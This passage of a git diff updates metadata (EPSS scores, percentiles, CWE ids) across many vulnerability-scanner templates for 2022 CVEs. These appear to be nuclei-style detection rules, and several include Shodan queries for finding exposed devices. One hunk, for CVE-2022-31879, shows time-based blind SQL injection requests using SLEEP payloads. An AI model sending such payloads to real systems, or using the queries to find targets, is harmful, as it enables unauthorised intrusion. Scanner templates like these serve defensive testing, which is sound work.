- epss-score: 0.0028
+ epss-score: 0.00237
cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*
+ epss-percentile: 0.61084
metadata:
max-request: 1
vendor: reprisesoftware
diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml
index e5cb013314..f12634d173 100644
--- a/http/cves/2022/CVE-2022-28365.yaml
+++ b/http/cves/2022/CVE-2022-28365.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-28365
- cwe-id: CWE-668
- epss-score: 0.00318
+ cwe-id: CWE-425
+ epss-score: 0.00333
cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*
+ epss-percentile: 0.67494
metadata:
max-request: 1
vendor: reprisesoftware
diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml
index 526137c93d..352d3cd8a6 100644
--- a/http/cves/2022/CVE-2022-2863.yaml
+++ b/http/cves/2022/CVE-2022-2863.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.9
cve-id: CVE-2022-2863
cwe-id: CWE-22
- epss-score: 0.69945
+ epss-score: 0.63285
cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97403
metadata:
max-request: 3
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml
index 4e0a191f49..a7c036bc4b 100644
--- a/http/cves/2022/CVE-2022-28923.yaml
+++ b/http/cves/2022/CVE-2022-28923.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-28923
cwe-id: CWE-601
- epss-score: 0.00819
+ epss-score: 0.00696
cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:*
+ epss-percentile: 0.7774
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml
index 52628cf6ac..cf5e704039 100644
--- a/http/cves/2022/CVE-2022-28955.yaml
+++ b/http/cves/2022/CVE-2022-28955.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-28955
cwe-id: CWE-287
- epss-score: 0.02513
+ epss-score: 0.02376
cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:*
+ epss-percentile: 0.88455
metadata:
max-request: 2
shodan-query: http.html:"DIR-816L"
diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml
index b717ad7d4e..b884041188 100644
--- a/http/cves/2022/CVE-2022-29004.yaml
+++ b/http/cves/2022/CVE-2022-29004.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00174
cpe: cpe:2.3:a:e-diary_management_system_project:e-diary_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.53866
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml
index 3e0136e954..19f1cf86da 100644
--- a/http/cves/2022/CVE-2022-29005.yaml
+++ b/http/cves/2022/CVE-2022-29005.yaml
@@ -18,13 +18,13 @@ info:
cwe-id: CWE-79
epss-score: 0.00115
cpe: cpe:2.3:a:online_birth_certificate_system_project:online_birth_certificate_system:1.2:*:*:*:*:*:*:*
+ epss-percentile: 0.44553
metadata:
max-request: 3
verified: true
vendor: online_birth_certificate_system_project
product: online_birth_certificate_system
tags: cve,cve2022,xss,obcs,authenticated
-
variables:
str: "{{rand_base(6)}}"
diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml
index a981443782..967d0bb598 100644
--- a/http/cves/2022/CVE-2022-29006.yaml
+++ b/http/cves/2022/CVE-2022-29006.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.20033
cpe: cpe:2.3:a:directory_management_system_project:directory_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.95679
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml
index 5314fc6b80..da79f1bf59 100644
--- a/http/cves/2022/CVE-2022-29007.yaml
+++ b/http/cves/2022/CVE-2022-29007.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.20033
cpe: cpe:2.3:a:dairy_farm_shop_management_system_project:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.95679
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml
index c8f1cdc6b2..57ccb9de04 100644
--- a/http/cves/2022/CVE-2022-29009.yaml
+++ b/http/cves/2022/CVE-2022-29009.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.20033
cpe: cpe:2.3:a:cyber_cafe_management_system_project:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.95679
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml
index b521113884..6d550743b3 100644
--- a/http/cves/2022/CVE-2022-29014.yaml
+++ b/http/cves/2022/CVE-2022-29014.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2022-29014
epss-score: 0.79768
cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:*
+ epss-percentile: 0.97868
metadata:
max-request: 1
vendor: razer
diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml
index 8b446a133e..308002ddb2 100644
--- a/http/cves/2022/CVE-2022-29078.yaml
+++ b/http/cves/2022/CVE-2022-29078.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29078
- cwe-id: CWE-74
- epss-score: 0.02303
+ cwe-id: CWE-94
+ epss-score: 0.02789
cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:*
+ epss-percentile: 0.89291
metadata:
max-request: 1
framework: node.js
diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml
index 7c50ab329b..8081d4e08d 100644
--- a/http/cves/2022/CVE-2022-29153.yaml
+++ b/http/cves/2022/CVE-2022-29153.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-29153
cwe-id: CWE-918
- epss-score: 0.01824
+ epss-score: 0.01648
cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*
+ epss-percentile: 0.85995
metadata:
max-request: 2
shodan-query: title:"Consul by HashiCorp"
diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml
index 546171cfb8..f9cebcb2f4 100644
--- a/http/cves/2022/CVE-2022-29272.yaml
+++ b/http/cves/2022/CVE-2022-29272.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-29272
cwe-id: CWE-601
- epss-score: 0.00174
+ epss-score: 0.00188
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.55474
metadata:
max-request: 2
vendor: nagios
diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml
index ca9992f843..ca570137dd 100644
--- a/http/cves/2022/CVE-2022-29298.yaml
+++ b/http/cves/2022/CVE-2022-29298.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-29298
cwe-id: CWE-22
- epss-score: 0.08968
+ epss-score: 0.13411
cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*
+ epss-percentile: 0.94862
metadata:
max-request: 1
shodan-query: http.html:"SolarView Compact"
diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml
index a4a8a5f652..1485f60190 100644
--- a/http/cves/2022/CVE-2022-29303.yaml
+++ b/http/cves/2022/CVE-2022-29303.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29303
- cwe-id: CWE-77
- epss-score: 0.96014
+ cwe-id: CWE-78
+ epss-score: 0.9661
cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*
+ epss-percentile: 0.99454
metadata:
max-request: 1
shodan-query: http.html:"SolarView Compact"
diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml
index 146c7339cf..86f22a4816 100644
--- a/http/cves/2022/CVE-2022-29349.yaml
+++ b/http/cves/2022/CVE-2022-29349.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-29349
cwe-id: CWE-79
- epss-score: 0.02254
+ epss-score: 0.01051
cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82198
metadata:
max-request: 1
shodan-query: http.html:"kkFileView"
diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml
index 3ce2599a0e..f49b63d2c5 100644
--- a/http/cves/2022/CVE-2022-29383.yaml
+++ b/http/cves/2022/CVE-2022-29383.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-29383
cwe-id: CWE-89
- epss-score: 0.5739
+ epss-score: 0.56167
cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:*
+ epss-percentile: 0.97221
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml
index 7af0773c4f..328ad36bdb 100644
--- a/http/cves/2022/CVE-2022-29455.yaml
+++ b/http/cves/2022/CVE-2022-29455.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-29455
cwe-id: CWE-79
- epss-score: 0.00165
+ epss-score: 0.0018
cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54527
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml
index 79894646f6..44d90e0ff8 100644
--- a/http/cves/2022/CVE-2022-29464.yaml
+++ b/http/cves/2022/CVE-2022-29464.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29464
- cwe-id: CWE-434
- epss-score: 0.97483
+ cwe-id: CWE-22
+ epss-score: 0.97451
cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99922
metadata:
max-request: 2
shodan-query: http.favicon.hash:1398055326
diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml
index cc03320a54..90bce2d52b 100644
--- a/http/cves/2022/CVE-2022-29548.yaml
+++ b/http/cves/2022/CVE-2022-29548.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00233
cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.60683
metadata:
max-request: 1
google-query: inurl:"carbon/admin/login"
diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml
index 0a6aa5c060..32d9fe231b 100644
--- a/http/cves/2022/CVE-2022-29775.yaml
+++ b/http/cves/2022/CVE-2022-29775.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-29775
cwe-id: CWE-287
- epss-score: 0.01075
+ epss-score: 0.0103
cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82001
metadata:
max-request: 1
shodan-query: http.html:"iSpy is running"
diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml
index dc73cc65d6..81483d05e1 100644
--- a/http/cves/2022/CVE-2022-30073.yaml
+++ b/http/cves/2022/CVE-2022-30073.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00159
cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:*
+ epss-percentile: 0.51862
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml
index 83be2e5bd4..f95838cc41 100644
--- a/http/cves/2022/CVE-2022-30489.yaml
+++ b/http/cves/2022/CVE-2022-30489.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00099
cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.40272
metadata:
max-request: 1
shodan-query: http.title:"Wi-Fi APP Login"
diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml
index d9428a1e26..90b756ac15 100644
--- a/http/cves/2022/CVE-2022-30512.yaml
+++ b/http/cves/2022/CVE-2022-30512.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-30512
cwe-id: CWE-89
- epss-score: 0.01318
+ epss-score: 0.0148
cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.85145
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml
index 66e23566af..790975341c 100644
--- a/http/cves/2022/CVE-2022-30513.yaml
+++ b/http/cves/2022/CVE-2022-30513.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00109
cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.43104
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml
index bbdd5516d6..145fd05b12 100644
--- a/http/cves/2022/CVE-2022-30514.yaml
+++ b/http/cves/2022/CVE-2022-30514.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00109
cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.43104
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml
index 32810de037..17dc34c9e3 100644
--- a/http/cves/2022/CVE-2022-30525.yaml
+++ b/http/cves/2022/CVE-2022-30525.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-30525
cwe-id: CWE-78
- epss-score: 0.97548
+ epss-score: 0.97528
cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99982
metadata:
max-request: 1
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml
index 1b2a7b5784..2bfc55f686 100644
--- a/http/cves/2022/CVE-2022-3062.yaml
+++ b/http/cves/2022/CVE-2022-3062.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-3062
cwe-id: CWE-79
- epss-score: 0.00071
+ epss-score: 0.00078
cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.32485
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml
index 83ff868dc5..73de78d8bf 100644
--- a/http/cves/2022/CVE-2022-30776.yaml
+++ b/http/cves/2022/CVE-2022-30776.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0011
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.43436
metadata:
max-request: 1
shodan-query: http.html:"atmail"
diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml
index a780863a5d..6f4f1cb32f 100644
--- a/http/cves/2022/CVE-2022-30777.yaml
+++ b/http/cves/2022/CVE-2022-30777.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00109
cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:*
+ epss-percentile: 0.43104
metadata:
max-request: 2
shodan-query: title:"h-sphere"
diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml
index 83d6746579..54c1ac8ba2 100644
--- a/http/cves/2022/CVE-2022-31126.yaml
+++ b/http/cves/2022/CVE-2022-31126.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-31126
cwe-id: CWE-74
- epss-score: 0.78469
+ epss-score: 0.82236
cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9795
metadata:
max-request: 1
shodan-query: http.html:"Roxy-WI"
diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml
index 6dbb0ed590..89c87a0990 100644
--- a/http/cves/2022/CVE-2022-31268.yaml
+++ b/http/cves/2022/CVE-2022-31268.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-31268
cwe-id: CWE-22
- epss-score: 0.0037
+ epss-score: 0.00582
cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:*
+ epss-percentile: 0.75319
metadata:
max-request: 1
shodan-query: http.html:"Gitblit"
diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml
index d833c89f31..78642cffa4 100644
--- a/http/cves/2022/CVE-2022-31269.yaml
+++ b/http/cves/2022/CVE-2022-31269.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.2
cve-id: CVE-2022-31269
cwe-id: CWE-798
- epss-score: 0.00357
+ epss-score: 0.00302
cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.65738
metadata:
max-request: 1
shodan-query: http.title:"Linear eMerge"
diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml
index b5a5ed0fa8..1d0ed09dc6 100644
--- a/http/cves/2022/CVE-2022-31299.yaml
+++ b/http/cves/2022/CVE-2022-31299.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-31299
cwe-id: CWE-79
- epss-score: 0.00153
+ epss-score: 0.00167
cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:*
+ epss-percentile: 0.52759
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml
index 1317514bd3..f52420ed19 100644
--- a/http/cves/2022/CVE-2022-31373.yaml
+++ b/http/cves/2022/CVE-2022-31373.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-31373
cwe-id: CWE-79
- epss-score: 0.001
+ epss-score: 0.00099
cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:*
+ epss-percentile: 0.40272
metadata:
max-request: 1
shodan-query: http.html:"SolarView Compact"
diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml
index a70a2231d5..aeafcf1d9e 100644
--- a/http/cves/2022/CVE-2022-31474.yaml
+++ b/http/cves/2022/CVE-2022-31474.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-31474
cwe-id: CWE-22
- epss-score: 0.00393
+ epss-score: 0.01583
cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.85716
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml
index ebdd6bd3f2..eb5dc9dc4f 100644
--- a/http/cves/2022/CVE-2022-31499.yaml
+++ b/http/cves/2022/CVE-2022-31499.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-31499
cwe-id: CWE-78
- epss-score: 0.03957
+ epss-score: 0.17666
cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95449
metadata:
max-request: 1
shodan-query: title:"eMerge"
diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml
index d22584c4ae..7f2d3969e3 100644
--- a/http/cves/2022/CVE-2022-31656.yaml
+++ b/http/cves/2022/CVE-2022-31656.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-31656
cwe-id: CWE-287
- epss-score: 0.91417
+ epss-score: 0.92696
cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*
+ epss-percentile: 0.98631
metadata:
max-request: 1
shodan-query: http.favicon.hash:-1250474341
diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml
index 70877e7a0c..40644ba056 100644
--- a/http/cves/2022/CVE-2022-31798.yaml
+++ b/http/cves/2022/CVE-2022-31798.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-31798
- cwe-id: CWE-79
- epss-score: 0.00109
+ cwe-id: CWE-384
+ epss-score: 0.00148
cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.50097
metadata:
max-request: 1
shodan-query: http.title:"eMerge"
diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml
index c1808a51d0..e914c107db 100644
--- a/http/cves/2022/CVE-2022-31814.yaml
+++ b/http/cves/2022/CVE-2022-31814.yaml
@@ -16,8 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31814
- epss-score: 0.96754
+ cwe-id: CWE-78
+ epss-score: 0.96743
cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*
+ epss-percentile: 0.99511
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml
index e9bb37c2e4..4d56a42a8e 100644
--- a/http/cves/2022/CVE-2022-31845.yaml
+++ b/http/cves/2022/CVE-2022-31845.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-31845
cwe-id: CWE-668
- epss-score: 0.00982
+ epss-score: 0.00789
cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*
+ epss-percentile: 0.79334
metadata:
max-request: 1
shodan-query: http.html:"Wavlink"
diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml
index 70a17b9565..75d575667f 100644
--- a/http/cves/2022/CVE-2022-31846.yaml
+++ b/http/cves/2022/CVE-2022-31846.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-31846
cwe-id: CWE-668
- epss-score: 0.00982
+ epss-score: 0.00789
cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*
+ epss-percentile: 0.79334
metadata:
max-request: 1
shodan-query: http.html:"Wavlink"
diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml
index 9936c27ce0..440f11315a 100644
--- a/http/cves/2022/CVE-2022-31847.yaml
+++ b/http/cves/2022/CVE-2022-31847.yaml
@@ -13,9 +13,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-31847
- cwe-id: CWE-668
- epss-score: 0.0072
+ cwe-id: CWE-425
+ epss-score: 0.00794
cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:*
+ epss-percentile: 0.79405
metadata:
max-request: 1
shodan-query: http.html:"Wavlink"
diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml
index 18836abee4..6b4f32d5b0 100644
--- a/http/cves/2022/CVE-2022-31854.yaml
+++ b/http/cves/2022/CVE-2022-31854.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-31854
cwe-id: CWE-434
- epss-score: 0.05293
+ epss-score: 0.062
cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:*
+ epss-percentile: 0.92636
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml
index 6d1a98f804..260d2f93d6 100644
--- a/http/cves/2022/CVE-2022-31879.yaml
+++ b/http/cves/2022/CVE-2022-31879.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-31879
cwe-id: CWE-89
- epss-score: 0.04694
+ epss-score: 0.0501
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9185
metadata:
max-request: 2
verified: true
@@ -30,7 +31,6 @@ http:
@timeout: 15s
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1
Host: {{Hostname}}
-
- |
@timeout: 15s
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1
diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml
index 0785efd06c..6e076ea57e 100644
--- a/http/cves/2022/CVE-2022-31974.yaml
+++ b/http/cves/2022/CVE-2022-31974.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-31974
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml
index 4fd8f7faab..4671f4a723 100644
--- a/http/cves/2022/CVE-2022-31975.yaml
+++ b/http/cves/2022/CVE-2022-31975.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-31975
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml
index 047a1af5ae..e473589f1d 100644
--- a/http/cves/2022/CVE-2022-31976.yaml
+++ b/http/cves/2022/CVE-2022-31976.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-31976
cwe-id: CWE-89
- epss-score: 0.01119
+ epss-score: 0.01144
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82961
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml
index 4313bcf268..1335eb969f 100644
--- a/http/cves/2022/CVE-2022-31977.yaml
+++ b/http/cves/2022/CVE-2022-31977.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-31977
cwe-id: CWE-89
- epss-score: 0.01119
+ epss-score: 0.01144
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82961
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml
index 4f562b434c..b6df63d585 100644
--- a/http/cves/2022/CVE-2022-31978.yaml
+++ b/http/cves/2022/CVE-2022-31978.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-31978
cwe-id: CWE-89
